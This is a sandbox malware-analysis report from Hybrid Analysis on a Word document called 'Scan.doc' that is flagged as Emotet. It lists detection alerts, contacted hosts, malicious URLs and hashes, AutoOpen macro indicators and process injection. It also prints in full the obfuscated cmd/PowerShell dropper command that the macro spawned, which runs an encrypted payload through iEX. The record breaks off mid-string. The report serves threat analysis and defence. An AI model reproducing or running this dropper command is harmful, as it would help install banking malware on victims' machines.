Scan.doc
This report is generated from a file or URL submitted to this webservice on February 28th 2018 11:13:47 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v7.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Persistence
- Spawns a lot of processes
- Network Behavior
- Contacts 4 domains and 5 hosts. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 15
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO TROJAN W32/Emotet.v4 Checkin" (SID: 2827279, Rev: 5, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN W32/Emotet.v4 Checkin 2" (SID: 2827580, Rev: 7, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN W32/Emotet.v4 Checkin 3" (SID: 2828008, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation" - source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
-
5/67 reputation engines marked "http://www.utilitybillingsoftwares.com" as malicious (7% detection rate)
6/67 reputation engines marked "http://amor.official.pw/f3sqvf" as malicious (8% detection rate)
9/67 reputation engines marked "http://amor.official.pw" as malicious (13% detection rate) - source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 5/59 Antivirus vendors marked sample as malicious (8% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
General
-
The analysis extracted a file that was identified as malicious
- details
- 34/67 Antivirus vendors marked dropped file "195082.exe" as malicious (classified as "Trojan.Generic" with 50% detection rate)
- source
- Binary File
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
-
34/67 Antivirus vendors marked spawned process "195082.exe" (PID: 2840) as malicious (classified as "Trojan.Generic" with 50% detection rate)
34/67 Antivirus vendors marked spawned process "195082.exe" (PID: 3360) as malicious (classified as "Trojan.Generic" with 50% detection rate) - source
- Monitored Target
- relevance
- 10/10
-
The analysis extracted a file that was identified as malicious
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 8 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"195082.exe" wrote 32 bytes to a remote process "%PUBLIC%\195082.exe" (Handle: 164)
"195082.exe" wrote 52 bytes to a remote process "%PUBLIC%\195082.exe" (Handle: 164)
"195082.exe" wrote 4 bytes to a remote process "%PUBLIC%\195082.exe" (Handle: 164)
"195082.exe" wrote 8 bytes to a remote process "%PUBLIC%\195082.exe" (Handle: 164) - source
- API Call
- relevance
- 6/10
-
Writes data to a remote process
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "173.203.172.88": ...
URL: http://www.utilitybillingsoftwares.com/ (AV positives: 5/67 scanned on 02/28/2018 08:02:13)
URL: http://utilitybillingsoftwares.com/Yr13ok/index.html (AV positives: 8/67 scanned on 02/28/2018 01:53:03)
URL: http://www.utilitybillingsoftwares.com/Yr13ok/index.html (AV positives: 8/67 scanned on 02/28/2018 00:06:06)
URL: http://www.utilitybillingsoftwares.com/Yr13ok/ (AV positives: 7/67 scanned on 02/27/2018 13:45:27)
URL: http://www.utilitybillingsoftwares.com/yr13ok (AV positives: 6/67 scanned on 02/27/2018 13:28:42)
File SHA256: 0bb6b5638e7e5b6068034307d04b3bf8f09ba54ba5da69759b920e5ed34c20bb (AV positives: 15/67 scanned on 02/27/2018 13:45:31)
File SHA256: bef50c1eae6f48db02f2a2241241cc795d36da171ffafb9c487e7bd4cabc7059 (AV positives: 12/68 scanned on 02/27/2018 09:45:11)
File SHA256: 3dac251a433eb94d360b2bf028ee2a0f22c580ce3babcb992567a97635c7c7ca (AV positives: 14/67 scanned on 02/27/2018 09:31:30)
File SHA256: 3755db1c072882be8811ea7b0be54eed8b1c62bb050f99663acd096af0d2a6bf (AV positives: 18/67 scanned on 02/27/2018 06:18:09)
File SHA256: 93f2f1c385dcfbbf2613b413f64764c6fb480905bbb5240b98c69b0f8e24dd60 (AV positives: 8/58 scanned on 02/13/2018 15:17:38)
Found malicious artifacts related to "69.175.93.166": ...
URL: http://musicamobil.com/ (AV positives: 2/67 scanned on 02/28/2018 10:11:03)
URL: http://amor.official.pw/ (AV positives: 9/67 scanned on 02/28/2018 08:01:55)
URL: http://official.pw/ (AV positives: 4/67 scanned on 02/28/2018 02:06:16)
URL: http://amor.official.pw/f3sqVF/ (AV positives: 10/67 scanned on 02/28/2018 00:22:47)
URL: http://musicamobil.com/Service-Report-1643/ (AV positives: 3/67 scanned on 02/27/2018 23:42:49)
File SHA256: 8292d65c4e38d3ba09cd6672b8646489728152a4f9c90152a03557661455665b (AV positives: 29/68 scanned on 02/28/2018 00:22:51)
File SHA256: 009cb1f25f52bbb9acc3d8d5bbe8c6c13aade01181c554c8fcdfbd0c3b004ef7 (AV positives: 17/59 scanned on 02/27/2018 23:42:52)
File SHA256: 4e41b1e1110e67933fca25e35be24beb3280e4841ef6228eda0cd5c94fc54a9c (AV positives: 5/59 scanned on 02/27/2018 19:48:35)
File SHA256: 70c65bd0e084398a87baa298c1fafa52afff402096cb350d563d309565c07e83 (AV positives: 1/59 scanned on 02/27/2018 15:37:46)
File SHA256: bef50c1eae6f48db02f2a2241241cc795d36da171ffafb9c487e7bd4cabc7059 (AV positives: 12/68 scanned on 02/27/2018 09:45:06)
Found malicious artifacts related to "217.160.0.130": ...
URL: http://t-p-e.net/ (AV positives: 4/67 scanned on 02/28/2018 08:02:22)
URL: http://uncoolmgz.com/abelo-valis-presenta-su-ultimo-trabajo-juana-la-loca (AV positives: 3/67 scanned on 02/28/2018 04:15:23)
URL: http://t-p-e.net/m8uzol (AV positives: 5/67 scanned on 02/27/2018 15:37:37)
URL: http://t-p-e.net/M8uZOL/ (AV positives: 5/67 scanned on 02/27/2018 13:45:19)
URL: http://t-p-e.net/M8uZOL (AV positives: 3/68 scanned on 02/27/2018 10:36:48)
File SHA256: 1fc10464806ad66967c95ca05f3f291c7bcafb5638d65be3bbf2ee998a4b1e1f (AV positives: 1/58 scanned on 02/27/2018 15:37:38)
File SHA256: 0bb6b5638e7e5b6068034307d04b3bf8f09ba54ba5da69759b920e5ed34c20bb (AV positives: 15/67 scanned on 02/27/2018 13:45:21)
File SHA256: bef50c1eae6f48db02f2a2241241cc795d36da171ffafb9c487e7bd4cabc7059 (AV positives: 12/68 scanned on 02/27/2018 09:45:06)
File SHA256: 3755db1c072882be8811ea7b0be54eed8b1c62bb050f99663acd096af0d2a6bf (AV positives: 18/67 scanned on 02/27/2018 06:18:09)
File SHA256: 8053159621a33e59ab160fc7db27ff0b51925c63b6b35798eb8699b608e1de59 (AV positives: 1/60 scanned on 02/23/2018 13:44:30)
Found malicious artifacts related to "94.199.180.228": ...
URL: http://www.erzotech.eu/ (AV positives: 6/67 scanned on 02/28/2018 08:02:17)
URL: http://erzotech.eu/esimB50/index.html (AV positives: 6/67 scanned on 02/27/2018 21:01:01)
URL: http://www.erzotech.eu/esimB50/ (AV positives: 6/67 scanned on 02/27/2018 16:45:03)
URL: http://erzotech.eu/esimB50/ (AV positives: 5/67 scanned on 02/27/2018 11:56:34)
URL: http://erzotech.eu/esimB50 (AV positives: 6/68 scanned on 02/27/2018 10:36:48)
File SHA256: 5b1e7ff769abda72132bb2d8c0b5d20c13158904c9de0b0df61e9ddeb092194f (AV positives: 21/68 scanned on 02/27/2018 16:45:07)
File SHA256: bef50c1eae6f48db02f2a2241241cc795d36da171ffafb9c487e7bd4cabc7059 (AV positives: 12/68 scanned on 02/27/2018 09:45:07)
File SHA256: 5762d2caeedef75abe1dd798444a85d0c40ef95cbfc3588a6ba28f5afe79262a (AV positives: 15/70 scanned on 02/27/2018 01:51:49)
File SHA256: 9f89814b48fc3249bf67a8a6e4439d97391b10b99f02b3da9e38345be1f1ed3f (AV positives: 1/60 scanned on 11/13/2017 12:33:16)
File SHA256: 17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8 (AV positives: 1/58 scanned on 08/07/2017 13:55:14) - source
- Network Traffic
- relevance
- 10/10
-
Multiple malicious artifacts seen in the context of different hosts
- details
-
Found malicious artifacts related to "173.203.172.88": ...
URL: http://www.utilitybillingsoftwares.com/ (AV positives: 5/67 scanned on 02/28/2018 08:02:13)
URL: http://utilitybillingsoftwares.com/Yr13ok/index.html (AV positives: 8/67 scanned on 02/28/2018 01:53:03)
URL: http://www.utilitybillingsoftwares.com/Yr13ok/index.html (AV positives: 8/67 scanned on 02/28/2018 00:06:06)
URL: http://www.utilitybillingsoftwares.com/Yr13ok/ (AV positives: 7/67 scanned on 02/27/2018 13:45:27)
URL: http://www.utilitybillingsoftwares.com/yr13ok (AV positives: 6/67 scanned on 02/27/2018 13:28:42)
File SHA256: 0bb6b5638e7e5b6068034307d04b3bf8f09ba54ba5da69759b920e5ed34c20bb (AV positives: 15/67 scanned on 02/27/2018 13:45:31)
File SHA256: bef50c1eae6f48db02f2a2241241cc795d36da171ffafb9c487e7bd4cabc7059 (AV positives: 12/68 scanned on 02/27/2018 09:45:11)
File SHA256: 3dac251a433eb94d360b2bf028ee2a0f22c580ce3babcb992567a97635c7c7ca (AV positives: 14/67 scanned on 02/27/2018 09:31:30)
File SHA256: 3755db1c072882be8811ea7b0be54eed8b1c62bb050f99663acd096af0d2a6bf (AV positives: 18/67 scanned on 02/27/2018 06:18:09)
File SHA256: 93f2f1c385dcfbbf2613b413f64764c6fb480905bbb5240b98c69b0f8e24dd60 (AV positives: 8/58 scanned on 02/13/2018 15:17:38)
Found malicious artifacts related to "69.175.93.166": ...
URL: http://musicamobil.com/ (AV positives: 2/67 scanned on 02/28/2018 10:11:03)
URL: http://amor.official.pw/ (AV positives: 9/67 scanned on 02/28/2018 08:01:55)
URL: http://official.pw/ (AV positives: 4/67 scanned on 02/28/2018 02:06:16)
URL: http://amor.official.pw/f3sqVF/ (AV positives: 10/67 scanned on 02/28/2018 00:22:47)
URL: http://musicamobil.com/Service-Report-1643/ (AV positives: 3/67 scanned on 02/27/2018 23:42:49)
File SHA256: 8292d65c4e38d3ba09cd6672b8646489728152a4f9c90152a03557661455665b (AV positives: 29/68 scanned on 02/28/2018 00:22:51)
File SHA256: 009cb1f25f52bbb9acc3d8d5bbe8c6c13aade01181c554c8fcdfbd0c3b004ef7 (AV positives: 17/59 scanned on 02/27/2018 23:42:52)
File SHA256: 4e41b1e1110e67933fca25e35be24beb3280e4841ef6228eda0cd5c94fc54a9c (AV positives: 5/59 scanned on 02/27/2018 19:48:35)
File SHA256: 70c65bd0e084398a87baa298c1fafa52afff402096cb350d563d309565c07e83 (AV positives: 1/59 scanned on 02/27/2018 15:37:46)
File SHA256: bef50c1eae6f48db02f2a2241241cc795d36da171ffafb9c487e7bd4cabc7059 (AV positives: 12/68 scanned on 02/27/2018 09:45:06)
Found malicious artifacts related to "217.160.0.130": ...
URL: http://t-p-e.net/ (AV positives: 4/67 scanned on 02/28/2018 08:02:22)
URL: http://uncoolmgz.com/abelo-valis-presenta-su-ultimo-trabajo-juana-la-loca (AV positives: 3/67 scanned on 02/28/2018 04:15:23)
URL: http://t-p-e.net/m8uzol (AV positives: 5/67 scanned on 02/27/2018 15:37:37)
URL: http://t-p-e.net/M8uZOL/ (AV positives: 5/67 scanned on 02/27/2018 13:45:19)
URL: http://t-p-e.net/M8uZOL (AV positives: 3/68 scanned on 02/27/2018 10:36:48)
File SHA256: 1fc10464806ad66967c95ca05f3f291c7bcafb5638d65be3bbf2ee998a4b1e1f (AV positives: 1/58 scanned on 02/27/2018 15:37:38)
File SHA256: 0bb6b5638e7e5b6068034307d04b3bf8f09ba54ba5da69759b920e5ed34c20bb (AV positives: 15/67 scanned on 02/27/2018 13:45:21)
File SHA256: bef50c1eae6f48db02f2a2241241cc795d36da171ffafb9c487e7bd4cabc7059 (AV positives: 12/68 scanned on 02/27/2018 09:45:06)
File SHA256: 3755db1c072882be8811ea7b0be54eed8b1c62bb050f99663acd096af0d2a6bf (AV positives: 18/67 scanned on 02/27/2018 06:18:09)
File SHA256: 8053159621a33e59ab160fc7db27ff0b51925c63b6b35798eb8699b608e1de59 (AV positives: 1/60 scanned on 02/23/2018 13:44:30)
Found malicious artifacts related to "94.199.180.228": ...
URL: http://www.erzotech.eu/ (AV positives: 6/67 scanned on 02/28/2018 08:02:17)
URL: http://erzotech.eu/esimB50/index.html (AV positives: 6/67 scanned on 02/27/2018 21:01:01)
URL: http://www.erzotech.eu/esimB50/ (AV positives: 6/67 scanned on 02/27/2018 16:45:03)
URL: http://erzotech.eu/esimB50/ (AV positives: 5/67 scanned on 02/27/2018 11:56:34)
URL: http://erzotech.eu/esimB50 (AV positives: 6/68 scanned on 02/27/2018 10:36:48)
File SHA256: 5b1e7ff769abda72132bb2d8c0b5d20c13158904c9de0b0df61e9ddeb092194f (AV positives: 21/68 scanned on 02/27/2018 16:45:07)
File SHA256: bef50c1eae6f48db02f2a2241241cc795d36da171ffafb9c487e7bd4cabc7059 (AV positives: 12/68 scanned on 02/27/2018 09:45:07)
File SHA256: 5762d2caeedef75abe1dd798444a85d0c40ef95cbfc3588a6ba28f5afe79262a (AV positives: 15/70 scanned on 02/27/2018 01:51:49)
File SHA256: 9f89814b48fc3249bf67a8a6e4439d97391b10b99f02b3da9e38345be1f1ed3f (AV positives: 1/60 scanned on 11/13/2017 12:33:16)
File SHA256: 17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8 (AV positives: 1/58 scanned on 08/07/2017 13:55:14) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc"" (Show Process)
Spawned process "cmd.exe" with commandline "cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" (Show Process), Spawned process "powershell.exe" with commandline "powershell "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA